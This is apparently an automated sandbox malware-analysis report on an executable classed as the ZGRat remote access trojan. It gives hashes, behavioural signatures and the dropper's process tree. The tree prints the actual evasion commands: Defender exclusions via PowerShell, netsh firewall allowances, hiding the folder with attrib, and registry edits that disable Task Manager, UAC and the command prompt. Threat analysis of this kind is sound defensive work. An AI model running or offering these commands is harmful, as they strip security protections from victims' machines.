Overview

overview

10

Static

static

3

aa913188cb...be.exe

windows7-x64

10

aa913188cb...be.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    152s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2024, 00:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa913188cbf14c18b50a9b546525fcbe.exe

  • Size

    8.4MB

  • MD5

    aa913188cbf14c18b50a9b546525fcbe

  • SHA1

    a4c7a4b090f013800cfe39a69312e78bba6814ee

  • SHA256

    8cd6382a91cf1f0d691f54178ec66897f69f2091f0f0d9ad6afd68951bffd271

  • SHA512

    eb3926392c3c650703a63f1aefc7a163cd7c6c0b126da311bc20f105f98dcc0287a48b6c65de505003f836b26a15c7b81d71eaad3b10188c112f39df1ed99d5a

  • SSDEEP

    196608:0jXi07LQczcygmpv4yrw15L33NohvUz/F9XriPdWRcADG98vEPsSUwaeoNOpmW8l:0jSSccW91B3uhUz/F9X+PAb69MfS9U

Score
10/10
zgratevasionpersistencerat

Malware Config

Signatures

  • Detect ZGRat V1 33 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 2 TTPs 8 IoCs
    evasion
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa913188cbf14c18b50a9b546525fcbe.exe
    "C:\Users\Admin\AppData\Local\Temp\aa913188cbf14c18b50a9b546525fcbe.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\ProgramData\Drivers\desktop.exe
      "C:\ProgramData\Drivers\desktop.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\process.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\Drivers\run.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:984
          • C:\Windows\SysWOW64\attrib.exe
            attrib +s +h "C:\ProgramData\Drivers"
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:560
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Drivers"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "process.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "desktop.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2404
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "download.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:332
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "setup.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2300
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "loader.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "Chrome.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "wscript.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1152
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "process.vbs"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "run.bat"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1316
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\process.exe" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:1700
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\run.bat" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:1028
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\Chrome.exe" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:1276
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\loader.exe" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:1704
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\setup.exe" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:2864
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\run.bat" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:364
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\process.vbs" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:2828
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\desktop.exe" Windows enable
            5⤵
            • Modifies Windows Firewall
            PID:2164
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System"
            5⤵
              PID:3016
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1
              5⤵
                PID:832
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLK\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0
                5⤵
                  PID:1988
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2
                  5⤵
                    PID:912
            • C:\ProgramData\Drivers\setup.exe
              "C:\ProgramData\Drivers\setup.exe"
              2⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              PID:2752
            • C:\ProgramData\Drivers\process.exe
              "C:\ProgramData\Drivers\process.exe"
              2⤵
              • Executes dropped EXE
              PID:2440
            • C:\ProgramData\Drivers\Chrome.exe
              "C:\ProgramData\Drivers\Chrome.exe"
              2⤵
              • Executes dropped EXE
              PID:2432

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Drivers\Chrome.exe
            Filesize

            1.7MB

            MD5

            6c9b04715e8d0f69062c598344ca9497

            SHA1

            455f9ab42cf988113458bc229a5f177a51ce1a0b

            SHA256

            1ef9171d1e9d8154615b28a402e8b0c867b6092c14be319a1df812c12ebcd14a

            SHA512

            d72cb8d29a4274d294ee0fb1ed91ad556a1b4962beb2a9614b5b4bf5c7e8d66d9fb3c9e308992bc66b4c41cbc2477c9aa493ba2da9b2c6c2c2c29d158d1e18a5

            Download Submit

          • C:\ProgramData\Drivers\Chrome.exe
            Filesize

            1.6MB

            MD5

            1fc66795c6aa33048d4dfd0b5736f7d8

            SHA1

            0348f2e13bad7df4d992566a20678d528c7e1d02

            SHA256

            2dcae3ef372359fe71c1b454144c72ab316d84a81edccd7d01f0008915fd70eb

            SHA512

            7a8d954e443a2a67dd689d0457fa1ef55b484ea25d786efdb6c33716e9cd303a6cbddec0fa1a050cb80720b63fcf071ed74d06c3239799d422b1b965c66a5c19

            Download Submit

          • C:\ProgramData\Drivers\Chrome.exe
            Filesize

            1.1MB

            MD5

            a9283adb81cb486620452f8ff4bbc317

            SHA1

            af1cac5cbc7dedbd9c689bdcc8819bff98dcebe2

            SHA256

            f02640322f793ef9295dad4cd1d602dc33267e352db6c08fe89b56a99552ed38

            SHA512

            bcd404960f8e9b4eec39b76ebfb82911b869f2932200c42a7471d639344dd9e310be4f883322ce2354ceda05d74813e531ea168f7346ff3e42253f2f8c661a1d

            Download Submit

          • C:\ProgramData\Drivers\process.exe
            Filesize

            1.6MB

            MD5

            eb57eea74a85c27789ce45ff6dc5a0a9

            SHA1

            66f72cdd73241cb494154596603c6e0821263ba5

            SHA256

            e0c262f30c333de4cebc556c4323e98865366af5ebf8ef8a8010282560e8d979

            SHA512

            81b2543b8f1ab4b695b5b0f2147bb4fccccd44e82621d4fb33b3b00ad84077a63a09f02b55301d6d0da86ab115a9305470ce75d2c16b21db50078bba3f2f4ee5

            Download Submit

          • C:\ProgramData\Drivers\process.exe
            Filesize

            1.1MB

            MD5

            fdb924f1c7b25669f1fcb1faad074bbd

            SHA1

            c23850fba792a6274602cdbf1c9573a4771b998d

            SHA256

            ac9248a09563184fff597f896931bde09df08f47f157cdbde9d570b84f92736e

            SHA512

            671ca64788c6c63c1aaa010593367768c9042600a35ce82708f18a1315b2e6b1d98aff8b427fa32511741f872dd5b30ff9e81dee706715f0b35a59ea3c6d7607

            Download Submit

          • C:\ProgramData\Drivers\process.vbs
            Filesize

            85B

            MD5

            a5777f481dbeb1c17d5952f6d095f013

            SHA1

            3dbed835a5318aa1dd7bb97ec97f83df16d5edb3

            SHA256

            1d8a8c43df987cea07eaf1c282c6dbc70f31bbec4c14cd66a886fdd7298474d9

            SHA512

            b8ed0f7535049fb76cefdfdf93b361709ab721d25690bce0b60afc90eade293c308fa5d4cd52d0042f52be89480830ddc4edf7962ead060040adef9c0b8bcf3e

            Download Submit

          • C:\ProgramData\Drivers\run.bat
            Filesize

            2KB

            MD5

            65c34cb26a12d07bdb1e96afce8834cf

            SHA1

            f4a91fdb3d9234c9194c4672a1adce57fd985399

            SHA256

            c71c52beb77ad75e63a52cb0b12a587e330f29fcffe7766beb60096b1ef880c7

            SHA512

            af6365b6020393a2b2f69cc26f9ca300190d2195fc7529d701640985dc8be3c4802b6d18dcae627eec3a7d15a2913322217e73002332d8979825e4a0a6c0d27b

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            1fdf81060e4d1ef30c2c49f6950cdcda

            SHA1

            cba2aeeff15b140c663027a18596f5bed7a78db4

            SHA256

            9aea857ed4fb10c94b46aecc1d7db452ec9940dc80389586f429454b6e051812

            SHA512

            069a826980b43c6a095ecb774ca20aed23a5e83377d8f6920d5dd968df85e8e75cb35441b7ad67b17ffb9652fa105c766aee528750d257f96107922d3b23cde6

            Download Submit

          • \ProgramData\Drivers\Chrome.exe
            Filesize

            1.9MB

            MD5

            d10acd6b2d1444031b1c431f1f1fbc28

            SHA1

            fd3cd9a7b81ebec0310268862255444d84b6fdb8

            SHA256

            554bf30b740a58f6b232206203417948c8adf44e8c2fae47c78d527464659c96

            SHA512

            8451f29ca89227e71e3828d29bec63b26f6b669abf63c4437ce7d3ff73130a18535f709fae27c46734c3b976dd62469869053871831fca222b2fe71897115338

            Download Submit

          • \ProgramData\Drivers\desktop.exe
            Filesize

            310KB

            MD5

            70937689b6f52f4b66c6735206b05880

            SHA1

            a8fb309d48f5ec3a5eacdf550bd978212940711d

            SHA256

            91669d0a10e671ec1fefb54b0aadc56fb944ff6325c373ba5dc0011a186803cc

            SHA512

            8e6d2edf9f1c53bbe1ebe3c3a4a8ac7e50819ec9e0769fd29532ed660d54a33be2bad85f105a8a23c643786140ab5601a8d73909bd5a9e82cf1a1fe6184bceb5

            Download Submit

          • \ProgramData\Drivers\process.exe
            Filesize

            448KB

            MD5

            307fd3785ce77ad6ac2f6a3701aed1c3

            SHA1

            f04b11a896889956de3986c40f54995c9d6dd483

            SHA256

            2bc94ccf56ca1b61d9e5271311819d041d714249bd557463ff6c736496385718

            SHA512

            3aec3987c6dd525298793d14131b891c45924afae07af31cfa9412f9cd6c5c4adbbec0801b441cbb6206f77163c4184c8d18ddca6a1f4c6c0644951cba147bee

            Download Submit

          • \ProgramData\Drivers\setup.exe
            Filesize

            26KB

            MD5

            d973b4acb8605075c0232164cee1cf0f

            SHA1

            492f3465da09ad2995ef52f204207fa39f6e7592

            SHA256

            1671d437c495b0484bc9c1623aa7ed3707f407214763294e875870698dee8da1

            SHA512

            f02b53252c436cb490eedc559f2dcd60a839215625d6fa3bb690246f0d5259388df712caa811236ecb92928d631539a0a6810875753597d53b259302d96b8be2

            Download Submit

          • memory/332-158-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/332-108-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/332-103-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/332-107-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/332-106-0x0000000002810000-0x0000000002850000-memory.dmp

            Filesize

            256KB

            Download

          • memory/344-72-0x00000000004D0000-0x0000000000510000-memory.dmp

            Filesize

            256KB

            Download

          • memory/344-69-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/344-70-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/344-71-0x00000000004D0000-0x0000000000510000-memory.dmp

            Filesize

            256KB

            Download

          • memory/344-73-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1152-146-0x00000000028D0000-0x0000000002910000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1152-145-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1152-148-0x00000000028D0000-0x0000000002910000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1152-147-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1152-149-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1316-170-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1316-168-0x00000000023C0000-0x0000000002400000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1316-167-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1344-137-0x0000000002420000-0x0000000002460000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1344-136-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1344-138-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1344-139-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1672-130-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1672-128-0x0000000002590000-0x00000000025D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1672-129-0x0000000002590000-0x00000000025D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1672-127-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/1672-126-0x0000000002590000-0x00000000025D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1672-125-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2140-80-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2140-83-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2140-79-0x0000000073CD0000-0x000000007427B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2140-81-0x0000000002790000-0x00000000027D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2300-117-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2300-115-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2300-116-0x00000000026F0000-0x0000000002730000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2300-118-0x00000000026F0000-0x0000000002730000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2300-119-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2404-96-0x0000000002810000-0x0000000002850000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2404-97-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2404-94-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2404-93-0x0000000002810000-0x0000000002850000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2404-92-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2432-95-0x000007FEF27C0000-0x000007FEF31AC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2432-213-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-233-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-225-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-176-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-237-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-221-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-67-0x000000001B8C0000-0x000000001B940000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2432-64-0x000007FEF27C0000-0x000007FEF31AC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2432-217-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-61-0x000000013FED0000-0x000000014021C000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2432-229-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-209-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-104-0x000000001B8C0000-0x000000001B940000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2432-205-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-201-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-197-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-161-0x000000001CE30000-0x000000001D15C000-memory.dmp

            Filesize

            3.2MB

            Download

          • memory/2432-193-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-189-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-185-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-181-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2432-177-0x000000001BD80000-0x000000001BDE9000-memory.dmp

            Filesize

            420KB

            Download

          • memory/2440-208-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-68-0x000000001C260000-0x000000001C2E0000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2440-180-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-105-0x000000001C260000-0x000000001C2E0000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2440-184-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-236-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-232-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-188-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-192-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-169-0x000000001E1F0000-0x000000001E6AC000-memory.dmp

            Filesize

            4.7MB

            Download

          • memory/2440-91-0x000007FEF27C0000-0x000007FEF31AC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2440-196-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-228-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-200-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-62-0x0000000000BA0000-0x0000000001084000-memory.dmp

            Filesize

            4.9MB

            Download

          • memory/2440-224-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-204-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-220-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-178-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-212-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2440-63-0x000007FEF27C0000-0x000007FEF31AC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2440-216-0x000000001B1F0000-0x000000001B26A000-memory.dmp

            Filesize

            488KB

            Download

          • memory/2752-82-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2752-90-0x0000000001F30000-0x0000000001FB0000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2752-59-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2752-58-0x0000000001F30000-0x0000000001FB0000-memory.dmp

            Filesize

            512KB

            Download

          • memory/2752-55-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/3020-155-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/3020-156-0x0000000002480000-0x00000000024C0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/3020-157-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/3020-159-0x0000000002480000-0x00000000024C0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/3020-160-0x00000000746A0000-0x0000000074C4B000-memory.dmp

            Filesize

            5.7MB

            Download